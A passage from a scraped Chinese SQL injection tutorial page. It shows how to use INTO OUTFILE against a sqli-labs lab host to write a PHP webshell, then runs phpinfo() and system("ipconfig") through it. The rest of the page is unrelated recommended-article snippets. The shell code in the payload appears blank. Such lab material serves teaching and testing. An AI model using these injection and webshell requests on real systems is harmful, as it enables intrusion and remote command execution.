SQL注入(一)-基础_第97张图片

2、文件上传(一句话木马)案例

1、先判断注入点 | 判断列数 | 判断注入方法这里我们的方法就是使用into outfile文件写入函数
2、构造文件写入一句话木马payload

http://192.168.2.101/sqli/Less-7?id=1')) union select 1,2,"" into outfile "C:\\phpstudy_pro\\www\\ben.php"--+

3、访问我们上传的木马文件

http://192.168.2.101/ben.php?pass=phpinfo();

SQL注入(一)-基础_第98张图片

除了使用phpinfo()函数,我们还可以使用system()来控制目标机器
例如:查看ip地址

http://192.168.2.101/ben.php?pass=system("ipconfig");

SQL注入(一)-基础_第99张图片

POST注入

一、POST请求方法之union注入

二、POST请求方法之报错注入

三、POST请求方法之盲注

四、POST dnslog注入

你可能感兴趣的:(sql,web安全)

  • Flink中的SQL Client和SQL Gateway BigDataMLApplication flinkflinksqlgateway
    Flink中的SQLClient和SQLGateway对比目录定义基本原理适用场景主要区别常用运维命令示例官方链接正文1.定义SQLClient:FlinkSQLClient是一种用于提交和执行FlinkSQL语句的命令行界面或图形界面工具。SQLGateway:FlinkSQLGateway是一个独立的服务,它允许客户端通过RESTfulAPI将SQL查询提交到Flink集群。2.基本原理SQL
  • unblock with ‘mysqladmin flush-hosts‘ 解决方法 祈祷平安,加油 数据库常见问题oracle数据库
    MySqlHostisblockedbecauseofmanyconnectionerrors;unblockwith'mysqladminflush-hosts'解决方法环境:linux,mysql5.5.21错误:Hostisblockedbecauseofmanyconnectionerrors;unblockwith'mysqladminflush-hosts'原因:同一个ip在短时间内产
  • 通俗易懂:MySQL中如何设置只读实例并确保数据一致性? 大龄下岗程序员 mysqljavamysqlspring
    在MySQL中设置只读实例主要应用于构建高可用性和扩展性的数据库环境,通常是为了分担读取负载或者用于备份和灾难恢复。以下是创建MySQL只读实例并确保数据一致性的基本步骤:1.创建并配置只读实例-主从复制设置-首先,你需要有一个主数据库实例(Master)负责接收所有的写操作。-创建一个或多个从数据库实例(Slave),并将它们配置为主数据库的复制品。这通常通过设置主从复制(Replication
  • Redis和MySQL的数据一致性问题思考 爱放火的安小妮 RedisMySQL思考总结redismysql数据库
    Redis和MySQL的数据一致性问题思考最近有在反思自己工作。因为自己这边是面向业务的,而且是和商品数据相关的。所以我平时工作中涉及到的最多的就是MySQL和Redis的数据存储。像我们配置商品是把商品配置到MySQL,但是对外toC接口都是直接读取Redis的。所以自然而然就涉及到MySQL和Redis的数据一致性问题。下面就是聊聊我自己对于这个问题的一个思考吧。有问题或者有更好方案的朋友也希
  • docker怎么端口映射 Lance_mu docker容器运维
    1、默认固定的端口#Web服务器:WebApache或Nginx通常使用80端口HTTP:80HTTPS:443#数据库服务器MySQL:3306PostgreSQL:5432MongoDB:27017Redis:6379#邮件服务器SMTP:25POP3:110IMAP:143#其他服务SSH:22FTP:21DNS(域名解析):53代理服务器Squid:3128版本控制系统Git:9418(S
  • 网络安全(黑客)——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 黑客(网络安全)技术自学30天 一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • MyBatis高级面试题-2024 my_styles mybatisjava开发语言面试题
    MyBatis的核心组件有哪些?首先第一个是,SqlSessionFactory,它就像是一个会话工厂。它的任务是创建SqlSession对象,这个对象是我们与数据库交互的主要途径。SqlSessionFactory的作用很重要,因为它可以帮我们配置数据库连接信息和事务管理等。一旦这个工厂被建立起来,它就会加载一些必要的配置和映射文件,为后续的数据库操作提供一个可靠的基础。第二个是SqlSessi
  • SQLite版本3中的文件锁定和并发(七) 代码工匠云 数据库SQLiteC与c++sqlitec++数据库
    返回:SQLite—系列文章目录上一篇:自己编译SQLite或将SQLite移植到新的操作系统(六)下一篇:SQLite—系列文章目录正文:1.0SQLite版本3中的文件锁定和并发SQLite版本3.0.0引入了新的锁定和日志功能旨在提高SQLite版本2的并发性的机制并减少作家的饥饿问题。新机制还允许交易的原子提交涉及多个数据库文件。本文档介绍新的锁定机制。目标受众是想要理解和/或修改的程序员
  • go-zero处理本地事务 年少~年 golanggolang后端
    go-zero处理本地事务,sqlx.SqlConn提供了基础的事务机制,官方代码varconnsqlx.SqlConnerr:=conn.TransactCtx(context.Background(),func(ctxcontext.Context,sessionsqlx.Session)error{r,err:=session.ExecCtx(ctx,"insertintouser(id,n
  • 高阶SQL语句(二) www.mcb.com 数据库mysql
    一子查询也被称作内查询或者嵌套查询,是指在一个查询语句里面还嵌套着另一个查询语句。子查询语句是先于主查询语句被执行的,其结果作为外层的条件返回给主查询进行下一步的查询过滤。①子语句可以与主语句所查询的表相同,也可以是不同表②子语句中的sql语句是为了,最后过滤出一个结果集,用于主语句的判断条件③in:将主表和子表关联/连接的语法环境准备:mysql>usekgc_ky35;Readingtable
  • 自学黑客(网络安全)技术——2024最新 九九归二 web安全安全学习笔记网络网络安全信息安全
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • Azkaban各种类型的Job编写 __元昊__
    一、概述原生的Azkaban支持的plugin类型有以下这些:command:Linuxshell命令行任务gobblin:通用数据采集工具hadoopJava:运行hadoopMR任务java:原生java任务hive:支持执行hiveSQLpig:pig脚本任务spark:spark任务hdfsToTeradata:把数据从hdfs导入TeradatateradataToHdfs:把数据从Te
  • Python Flask 使用数据库 安果移不动 pythonflask开发语言
    pipinstallflask_sqlalchemy官方文档:Flask-SQLAlchemy—Flask-SQLAlchemyDocumentation(3.1.x)为了不报错也需要导入另外两个库#pipinstallflask_sqlalchemy#pipinstallmysqlclient完整代码importosfromflaskimportFlaskfromflask_sqlalchemy
  • .NET Core 将实体类转换为 SQL(ORM 映射) 你小子在看什么…… .NET.netcoresqlsugarpostgresql
    一、环境说明PostgreSQL数据库Npgsql数据库连接库SqlSugarORM框架二、映射流程1、创建数据库:检查指定数据库是否存在,如果不存在则创建数据库。2、初始化SqlSugar实例:使用SqlSugarClient初始化数据库连接配置。3、筛选实体类:根据指定的命名空间和排除条件筛选需要创建表的实体类。4、创建表:使用CodeFirst.InitTables方法创建数据库表。////
  • 第七章 索引及执行计划,存储引擎 执笔为剑 #MySQL运维篇编辑器mysql
    第七章索引及执行计划,存储引擎1,索引及执行计划1,作用:提供类似书目录的作用,目的是优化查询2,所用的种类(根据算法)B树索引Hash索引R树FulltextGIS3,B树基于不同的查找算法分类介绍B-tree:在范围查询方面提供了更好的性能(>showengines;#存储引擎作用在表上,不同的表可能有不同的存储引擎mysql>select@@default_storage_engine;#查
  • Thinkphp - 详细实现网站系统登录功能,附带 Mysql 数据库设置、Web 前端展示界面、信息校验等(详细代码,即设计过程) 王佳斌 +Thinkphpmysql前端数据库
    前言登录功能,是我们几乎开发每个系统都必须的模块。登录功能设计思路,主要包括几个方面。用户输入网址展示登录页面用户输入用户名,密码等点击登录进行信息校验校验通过之后,记录用户登录信息,跳转指定页面用户校验失败,提示失败信息页面目录具体功能实现为了快速搭建可用、美观的页面,我们采用一个比较成熟的前端框架Bootstrap。下面我们到Bootstrap的官网Bootsrap官网下载bootstrap。
  • 设置mysql 数据库和表 的编码方式UTF-8 盖盖衍上 中间件数据库mysqloracle
    要设置MySQL数据库表和字段的编码方式为UTF-8,可以使用下面的SQL语句:1.设置数据库默认编码为UTF-8:ALTERDATABASEyour_database_nameCHARACTERSETutf8mb4COLLATEutf8mb4_unicode_ci;2.创建表时指定编码为UTF-8:CREATETABLEyour_table_name(column1VARCHAR(100)CHA
  • 【二】【设计模式】建造者模式 妖精七七_ 设计模式设计模式建造者模式
    建造者模式的引入//C10_1.cpp#include#include"SystemConfig.h"intmain(){SystemConfigconfig("mysql://127.0.0.1/","xiaomu","xiaomumemeda","redis://127.0.0.1/","xiaomuredis","xiaomuredispw","kafka://127.0.0.1","xia
  • Linux(centos7)部署hive 灯下夜无眠 Linuxlinuxhive运维dbeaverhive客户端
    前提环境:已部署完hadoop(HDFS、MapReduce、YARN)1、安装元数据服务MySQL切换root用户#更新密钥rpm--importhttps://repo.mysql.com/RPM-GPG-KEY-mysqL-2022#安装Mysqlyum库rpm-Uvhhttp://repo.mysql.com//mysql57-community-release-el7-7.noarch.
  • mysql 常见数据表操作 天狼1222 mysql系列mysql数据库
    前面介绍了数据库表的基本操作。把常用的做一个汇总。时间久了,记不得完整的语法了,再打开一看,就清楚了。1,表操作1,建表+注释CREATETABLEstudent(idINTPRIMARYKEYAUTO_INCREMENTCOMMENT'学号',nameVARCHAR(200)COMMENT'姓名',ageINTCOMMENT'年龄')COMMENT='学生表'2,修改注释--修改表注释-ALTE
  • 通俗易懂:描述MySQL中SET和ENUM数据类型的异同。 大龄下岗程序员 mysqljavamysqlspring
    MySQL中的SET和ENUM数据类型均用于限制字段可接受的值范围,但它们的设计用途和功能特性有所不同:SET类型-SET是一种集合类型,它可以存储一组预定义的离散值,并且在一个SET字段中可以同时存储多个值。-SET字段内的值是互斥的,即同一时间不会存在相同的元素两次,但可以有多个不同的元素组合。-值之间的分隔通常用逗号(,)或其他指定字符。-SET类型的字段最大可以容纳64个不同的成员值。-在
  • GROM学习 码小白l golang
    什么是GROMGo语言ORM(对象关系映射)库,它提供了一种高效、简洁的方式来操作数据库。通过将数据库表映射为Go语言的结构体,GORM让数据库操作变得更加直观和类型安全。GORM支持主流的数据库系统,包括MySQL、PostgreSQL、SQLite和SQLServer等GORM提供了一系列的API来操作MySQL数据库。以下是一些常用的GORMAPI操作,以及它们在操作MySQL时的用法:安装
  • Mysql数据库MariaDB数据库MHA高可用程序 yichen_china
    声明:本次实验使用的是MariaDB数据库,所以本文中所出现的MariaDB与MySQL都是指的是MariaDB!!!MHA(MasterHA)是一款开源的MySQL的高可用程序,它为MySQL主从复制架构提供了automatingmasterfailover功能。MHA在监控到master节点故障时,会提升其中拥有最新数据的slave节点成为新的master节点,在此期间,MHA会通过于其它从节
  • centos7中的MySQL安装 老伙子53 mysql数据库
    centos7中的MySQL安装一、MySQL5.7.17安装脚本#!/bin/bashcd/rootmkdirmysql_tarwgethttps://downloads.mysql.com/archives/get/p/23/file/mysql-community-server-5.7.17-1.el7.x86_64.rpmwgethttps://downloads.mysql.com/ar
  • 【PHP】通过PHP开启/暂停Apache、MySQL或其他服务 下页、再停留 PHPphpapachemysql
    目录一、前言二、代码一、前言有些时候我们需要开启或暂停一些服务,比如说开启Apach或暂停MySQL服务等,最近工作中也开发了这方面的功能,记录下来怎样使用PHP语言来开启或暂停Apache、MySQL服务的运行状态。这种方法也适用其他服务。如果想了解怎么实时监控服务的运行状态,可以看上一篇文章【PHP】通过PHP实时监控Apache、MySQL服务运行状态-CSDN博客二、代码有三个参数需要根据
  • 基于SSM+Vue企业销售培训系统 企业人才培训系统 企业课程培训管理系统 企业文化培训班系统Java 计算机程序老哥
    作者主页:计算机毕业设计老哥有问题可以主页问我一、开发介绍1.1开发环境开发语言:Java数据库:MySQL系统架构:B/S后端:SSM(Spring+SpringMVC+Mybatis)前端:Vue工具:IDEA或者Eclipse,JDK1.8,Maven二、系统介绍2.1图片展示注册登录页面:登陆.png前端页面功能:首页、培训班、在线学习、企业文化、交流论坛、试卷列表、系统公告、留言反馈、个
  • SQL运维_Unix下MySQL-8.0.18配置文件示例 Mostcow SQLsql运维unix
    SQL运维_Unix下MySQL-8.0.18配置文件示例MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,属于Oracle旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(RelationalDatabaseManagementSystem,关系数据库管理系统)应用软件之一。MySQL是一种关系型数据库管理系统,关系数据库将
  • 在 Linux/Ubuntu/Debian 上安装 SQL Server 2019 理工男老K ubuntulinux运维debiansqlserver
    Microsoft为Linux发行版(包括Ubuntu)提供SQLServer。以下是有关如何执行此操作的基本指南:注册MicrosoftUbuntu存储库并添加公共存储库GPG密钥:sudowget-qO-https://packages.microsoft.com/keys/microsoft.asc|sudoapt-keyadd-sudoadd-apt-repository"$(wget-q
  • 福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621) OidBoy_G 漏洞复现安全web安全
    0x01产品简介福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。0x02漏洞概述福建科立讯通信指挥调度管理平台down_fil
  • ASM系列六 利用TreeApi 添加和移除类成员 lijingyao8206 jvm动态代理ASM字节码技术TreeAPI
        同生成的做法一样,添加和移除类成员只要去修改fields和methods中的元素即可。这里我们拿一个简单的类做例子,下面这个Task类,我们来移除isNeedRemove方法,并且添加一个int 类型的addedField属性。   package asm.core; /** * Created by yunshen.ljy on 2015/6/
  • Springmvc-权限设计 bee1314 springWebjsp
    万丈高楼平地起。 权限管理对于管理系统而言已经是标配中的标配了吧,对于我等俗人更是不能免俗。同时就目前的项目状况而言,我们还不需要那么高大上的开源的解决方案,如Spring Security,Shiro。小伙伴一致决定我们还是从基本的功能迭代起来吧。 目标: 1.实现权限的管理(CRUD) 2.实现部门管理 (CRUD) 3.实现人员的管理 (CRUD) 4.实现部门和权限
  • 算法竞赛入门经典(第二版)第2章习题 CrazyMizzz c算法
    2.4.1 输出技巧 #include <stdio.h> int main() { int i, n; scanf("%d", &n); for (i = 1; i <= n; i++) printf("%d\n", i); return 0; } 习题2-2 水仙花数(daffodil
  • struts2中jsp自动跳转到Action 麦田的设计者 jspwebxmlstruts2自动跳转
    1、在struts2的开发中,经常需要用户点击网页后就直接跳转到一个Action,执行Action里面的方法,利用mvc分层思想执行相应操作在界面上得到动态数据。毕竟用户不可能在地址栏里输入一个Action(不是专业人士)   2、<jsp:forward page="xxx.action" /> ,这个标签可以实现跳转,page的路径是相对地址,不同与jsp和j
  • php 操作webservice实例 IT独行者 PHPwebservice
    首先大家要简单了解了何谓webservice,接下来就做两个非常简单的例子,webservice还是逃不开server端与client端。我测试的环境为:apache2.2.11 php5.2.10做这个测试之前,要确认你的php配置文件中已经将soap扩展打开,即extension=php_soap.dll; OK 现在我们来体验webservice //server端 serve
  • Windows下使用Vagrant安装linux系统 _wy_ windowsvagrant
    准备工作: 下载安装 VirtualBox :https://www.virtualbox.org/ 下载安装 Vagrant :http://www.vagrantup.com/ 下载需要使用的 box : 官方提供的范例:http://files.vagrantup.com/precise32.box 还可以在 http://www.vagrantbox.es/ 
  • 更改linux的文件拥有者及用户组(chown和chgrp) 无量 clinuxchgrpchown
    本文(转) http://blog.163.com/yanenshun@126/blog/static/128388169201203011157308/ http://ydlmlh.iteye.com/blog/1435157 一、基本使用: 使用chown命令可以修改文件或目录所属的用户:        命令
  • linux下抓包工具 矮蛋蛋 linux
    原文地址: http://blog.chinaunix.net/uid-23670869-id-2610683.html tcpdump -nn -vv -X udp port 8888 上面命令是抓取udp包、端口为8888 netstat -tln 命令是用来查看linux的端口使用情况 13 . 列出所有的网络连接 lsof -i 14. 列出所有tcp 网络连接信息 l
  • 我觉得mybatis是垃圾!:“每一个用mybatis的男纸,你伤不起” alafqq mybatis
    最近看了  每一个用mybatis的男纸,你伤不起 原文地址 :http://www.iteye.com/topic/1073938 发表一下个人看法。欢迎大神拍砖; 个人一直使用的是Ibatis框架,公司对其进行过小小的改良; 最近换了公司,要使用新的框架。听说mybatis不错;就对其进行了部分的研究; 发现多了一个mapper层;个人感觉就是个dao;
  • 解决java数据交换之谜 百合不是茶 数据交换
    交换两个数字的方法有以下三种 ,其中第一种最常用   /* 输出最小的一个数 */ public class jiaohuan1 { public static void main(String[] args) { int a =4; int b = 3; if(a<b){ // 第一种交换方式 int tmep =
  • 渐变显示 bijian1013 JavaScript
    <style type="text/css"> #wxf { FILTER: progid:DXImageTransform.Microsoft.Gradient(GradientType=0, StartColorStr=#ffffff, EndColorStr=#97FF98); height: 25px; } </style>
  • 探索JUnit4扩展:断言语法assertThat bijian1013 java单元测试assertThat
    一.概述         JUnit 设计的目的就是有效地抓住编程人员写代码的意图,然后快速检查他们的代码是否与他们的意图相匹配。 JUnit 发展至今,版本不停的翻新,但是所有版本都一致致力于解决一个问题,那就是如何发现编程人员的代码意图,并且如何使得编程人员更加容易地表达他们的代码意图。JUnit 4.4 也是为了如何能够
  • 【Gson三】Gson解析{"data":{"IM":["MSN","QQ","Gtalk"]}} bit1129 gson
      如何把如下简单的JSON字符串反序列化为Java的POJO对象? {"data":{"IM":["MSN","QQ","Gtalk"]}}   下面的POJO类Model无法完成正确的解析:   import com.google.gson.Gson;
  • 【Kafka九】Kafka High Level API vs. Low Level API bit1129 kafka
    1. Kafka提供了两种Consumer API High Level Consumer API Low Level Consumer API(Kafka诡异的称之为Simple Consumer API,实际上非常复杂) 在选用哪种Consumer API时,首先要弄清楚这两种API的工作原理,能做什么不能做什么,能做的话怎么做的以及用的时候,有哪些可能的问题  
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-归并排序 bylijinnan java
    import java.util.Arrays; public class MergeSort { public static void main(String[] args) { int[] a={20,1,3,8,5,9,4,25}; mergeSort(a,0,a.length-1); System.out.println(Arrays.to
  • Netty源码学习-CompositeChannelBuffer bylijinnan javanetty
    CompositeChannelBuffer体现了Netty的“Transparent Zero Copy” 查看API( http://docs.jboss.org/netty/3.2/api/org/jboss/netty/buffer/package-summary.html#package_description) 可以看到,所谓“Transparent Zero Copy”是通
  • Android中给Activity添加返回键 hotsunshine Activity
    // this need android:minSdkVersion="11" getActionBar().setDisplayHomeAsUpEnabled(true); @Override public boolean onOptionsItemSelected(MenuItem item) {
  • 静态页面传参 ctrain 静态
    $(document).ready(function () { var request = { QueryString : function (val) { var uri = window.location.search; var re = new RegExp("" + val + "=([^&?]*)", &
  • Windows中查找某个目录下的所有文件中包含某个字符串的命令 daizj windows查找某个目录下的所有文件包含某个字符串
    findstr可以完成这个工作。   [html]  view plain copy   >findstr /s /i "string" *.*   上面的命令表示,当前目录以及当前目录的所有子目录下的所有文件中查找"string&qu
  • 改善程序代码质量的一些技巧 dcj3sjt126com 编程PHP重构
    有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点,程序你只写一次,但以后会无数次的阅读。当你第二天回头来看你的代码 时,你就要开始阅读它了。当你把代码拿给其他人看时,他必须阅读你的代码。因此,在编写时多花一点时间,你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧:    尽量保持方法简短    尽管很多人都遵
  • SharedPreferences对数据的存储 dcj3sjt126com
    SharedPreferences简介:                                                   &nbs
  • linux复习笔记之bash shell (2) bash基础 eksliang bashbash shell
    转载请出自出处: http://eksliang.iteye.com/blog/2104329 1.影响显示结果的语系变量(locale)  1.1locale这个命令就是查看当前系统支持多少种语系,命令使用如下: [root@localhost shell]# locale LANG=en_US.UTF-8 LC_CTYPE="en_US.UTF-8"
  • Android零碎知识总结 gqdy365 android
    1、CopyOnWriteArrayList add(E) 和remove(int index)都是对新的数组进行修改和新增。所以在多线程操作时不会出现java.util.ConcurrentModificationException错误。 所以最后得出结论:CopyOnWriteArrayList适合使用在读操作远远大于写操作的场景里,比如缓存。发生修改时候做copy,新老版本分离,保证读的高
  • HoverTree.Model.ArticleSelect类的作用 hvt Web.netC#hovertreeasp.net
    ArticleSelect类在命名空间HoverTree.Model中可以认为是文章查询条件类,用于存放查询文章时的条件,例如HvtId就是文章的id。HvtIsShow就是文章的显示属性,当为-1是,该条件不产生作用,当为0时,查询不公开显示的文章,当为1时查询公开显示的文章。HvtIsHome则为是否在首页显示。HoverTree系统源码完全开放,开发环境为Visual Studio 2013
  • PHP 判断是否使用代理 PHP Proxy Detector 天梯梦 proxy
    1. php 类 I found this class looking for something else actually but I remembered I needed some while ago something similar and I never found one. I'm sure it will help a lot of developers who try to
  • apache的math库中的回归——regression(翻译) lvdccyb Mathapache
    这个Math库,虽然不向weka那样专业的ML库,但是用户友好,易用。 多元线性回归,协方差和相关性(皮尔逊和斯皮尔曼),分布测试(假设检验,t,卡方,G),统计。   数学库中还包含,Cholesky,LU,SVD,QR,特征根分解,真不错。   基本覆盖了:线代,统计,矩阵, 最优化理论 曲线拟合 常微分方程 遗传算法(GA), 还有3维的运算。。。
  • 基础数据结构和算法十三:Undirected Graphs (2) sunwinner Algorithm
      Design pattern for graph processing. Since we consider a large number of graph-processing algorithms, our initial design goal is to decouple our implementations from the graph representation
  • 云计算平台最重要的五项技术 sumapp 云计算云平台智城云
    云计算平台最重要的五项技术 1、云服务器 云服务器提供简单高效,处理能力可弹性伸缩的计算服务,支持国内领先的云计算技术和大规模分布存储技术,使您的系统更稳定、数据更安全、传输更快速、部署更灵活。 特性 机型丰富 通过高性能服务器虚拟化为云服务器,提供丰富配置类型虚拟机,极大简化数据存储、数据库搭建、web服务器搭建等工作; 仅需要几分钟,根据CP
  • 《京东技术解密》有奖试读获奖名单公布 ITeye管理员 活动
    ITeye携手博文视点举办的12月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。  12月试读活动回顾: http://webmaster.iteye.com/blog/2164754 本次技术图书试读活动获奖名单及相应作品如下: 一等奖(两名) Microhardest:http://microhardest.ite
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他